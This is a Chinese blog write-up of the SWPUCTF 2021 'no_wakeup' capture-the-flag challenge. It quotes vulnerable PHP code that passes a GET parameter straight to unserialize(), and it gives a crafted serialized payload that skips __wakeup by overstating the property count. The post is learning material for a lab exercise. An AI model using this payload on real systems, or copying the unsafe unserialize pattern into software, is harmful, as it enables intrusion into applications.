[SWPUCTF 2021 新生赛]no_wakeup

于 2023-12-12 18:15:39 发布
阅读量65 收藏
点赞数
分类专栏: web 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134955868
版权 
 <?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

一个简单的PHP的反序列化

有3个构造方法

__construct(): //构造函数,当对象new的时候会自动调用

__destruct()://析构函数当对象被销毁时会被自动调用

__wakeup(): //unserialize()时会被自动调用

这里的__wakeup()会改变admin和pawssd的值,所以考虑绕过这个函数

<?php
class HaHaHa{


        public $admin = 'admin';
        public $passwd = 'wllm';
            
    }

$a = new HaHaHa;
echo serialize($a)

?>

要绕过__wakeup(),可以修改序列化字符串中表示对象属性个数,当表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

沈理大学牲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wakeup_asm.rar_startup_wakeup
09-19
ACPI wakeup real mode startup stub.
WakeUP_Poweroff.rar_WakeUP_Poweroff_delphi_delphi 托盘_网络唤醒
09-19
网络唤醒的原理及实例,托盘实例,定时关、ini文件的操作等。
[我们用的]AS3932_LF_Wakeup_Receiver_Datasheet_v1_4
02-16
[我们用的]AS3932_LF_Wakeup_Receiver_Datasheet_v1_4
hh_Bot_wakeUp
02-22
hh_Bot_wakeUp
WakeupTimer_INT.rar_T7Z_Wakeup Output_反射 红外_液位检测_红外反射式液位检测
09-15
通过检测红外的反射强度来判断液体的位置。
RH850_CS+_DeepSleep_Wakeup_INTP12
05-25
适合新手学习,代码经过实际的硬件测试,完美运行
rpi_wakeup_light:树莓派 - 早晨起床灯
06-15
树莓派 - 早晨起床灯 这个小项目的目的是创建类似于飞利浦唤醒灯行为的东西,使用 LED 灯条和带有蓝牙通信的 Raspberry Pi。 由于这有点明显,我不对任何损失或因使用此信息而烧毁您的房屋承担任何责任。...
STM32F103_STOP_Mode_wakeup.zip
03-06
1.实现了两路外部中断唤醒。 2.也实现了RTC闹钟唤醒。 3.基于FreeRTOS系统。 4.很方便移植到自己的代码里。
TM57PE12_WAKEUP_INT0_TM0.zip_遥控
09-21
Int0口用做遥控信号接收脚。 TM0做抓码计时用,接收到正确的遥控编码将关闭或者打开指示灯LED1(PBD,0)脚
nRF9E5_wakeup.rar_单片机开发_Visual_C++_
08-11
nRF9E5_wakeup介绍如果使用9E5相关的模式程序
分布式计算系统导论(课后题)_wakeup42的博客-CSDN博客.mht
03-03
分布式计算系统导论(课后题)_wakeup42的博客-CSDN博客.mht
SP37_LF_Wakeup and Data Receiving.rar_LF低频唤醒_TPMS_TPMS-SP37_sp37
07-14
英飞凌TPMS芯片SP37的低频功能唤醒实现代码
EM78P153S_PG006_Wakeup_EM78P153SWakeup_EM78P153SIO_
09-30
EM78P153S Wakeup,PG006 io口睡眠 唤醒处理
VarExporter组件允许将任何可序列化PHP数据结构导出为纯PHP代码。 这样做时,它保留了与PHP的序列化机制(__wakeup,__ sleep,Serializable)相关的所有语义。-PHP开发
05-27
这样做时,它保留了与PHP序列化机制相关的所有语义(__wakeup,VarExporter组件VarExporter组件允许将任何可序列化PHP数据结构导出到纯PHP代码。同时,它保留了与序列化机制相关联的所有语义。PHP(__ wakeup,__ ...
var-exporter:VarExporter组件允许将任何可序列化PHP数据结构导出为纯PHP代码。 这样做时,它保留了与PHP的序列化机制(__wakeup,__ sleep,Serializable)相关的所有语义。
02-05
虽然这样做,它保留了与PHP的序列化机制(相关联的所有语义__wakeup , __sleep , Serializable , __serialize , __unserialize )。 它还提供了一个实例化器,该实例化器允许创建和填充对象而无需调用其构造...
华工.wakeup_schedule
11-06
华工.wakeup_schedule
wakeup_platform_global:wakeup_platform 的全局节点(https
06-23
介绍 该项目涵盖了用于将手机从空闲状态唤醒的平台的本地节点。 这是第一个实现到通知服务器...Local wakeup node source code (the one installed into the mobile network)/src/global -> Global wakeup server sourc
天工职.wakeup_schedule
11-12
天工职.wakeup_schedule
大二上.wakeup_schedule
09-19
大二上.wakeup_schedule
RTC_WAKEUP
最新发布
03-20
RTC_WAKEUPAndroid系统中的一个常量,用于设置定时唤醒设备的类型之一。RTC_WAKEUP使用的是实时时钟(RTC)来触发设备的唤醒,即在指定的时间点唤醒设备。 RTC_WAKEUP常常用于实现一些需要在特定时间执行的任务,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值